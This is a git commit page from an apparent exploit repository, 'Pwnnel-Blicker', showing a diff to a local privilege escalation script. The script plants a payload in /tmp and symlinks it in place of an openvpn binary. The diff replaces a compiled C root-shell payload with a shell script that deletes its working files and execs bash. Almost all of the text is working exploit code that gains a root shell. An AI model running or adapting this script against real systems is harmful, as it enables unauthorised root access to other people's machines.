diff options
author | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-08-11 18:27:17 +0200 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-08-11 18:27:17 +0200 |
commit | 1850b499900a3a573e6bc27224becaa8588be8dd (patch) | |
tree | 8ac58f99d3780061430c3749104a39c94ca17115 | |
parent | Because fixing security holes in security exploits is hilarious. (diff) | |
download | Pwnnel-Blicker-1850b499900a3a573e6bc27224becaa8588be8dd.tar.xz Pwnnel-Blicker-1850b499900a3a573e6bc27224becaa8588be8dd.zip |
It already drops privs.
-rwxr-xr-x | pwnnel-blicker-for-kids.sh | 22 |
1 files changed, 7 insertions, 15 deletions
diff --git a/pwnnel-blicker-for-kids.sh b/pwnnel-blicker-for-kids.sh index 9eb2c73..b001529 100755 --- a/pwnnel-blicker-for-kids.sh +++ b/pwnnel-blicker-for-kids.sh @@ -17,22 +17,14 @@ echo "[+] Making vulnerable directory." mkdir -pv /tmp/pwn/openvpn/openvpn-0 echo "[+] Preparing payload." -cat > /tmp/pwn/root.c <<_EOF -#include <unistd.h> -#include <sys/stat.h> -#include <stdio.h> - -int main() -{ - printf("[+] Cleaning up.\n"); - system("rm -rfv /tmp/pwn"); - printf("[+] Getting root.\n"); - setuid(0); - setgid(0); - execl("/bin/bash", "bash", NULL); -} +cat > /tmp/pwn/root <<_EOF +#!/bin/sh +echo "[+] Cleaning up." +rm -rfv /tmp/pwn +echo "[+] Getting root." +exec bash _EOF -gcc -o /tmp/pwn/root /tmp/pwn/root.c +chmod +x /tmp/pwn/root echo "[+] Creating symlinks." ln -s -v -f /tmp/pwn/root /tmp/pwn/openvpn/openvpn-0/openvpn |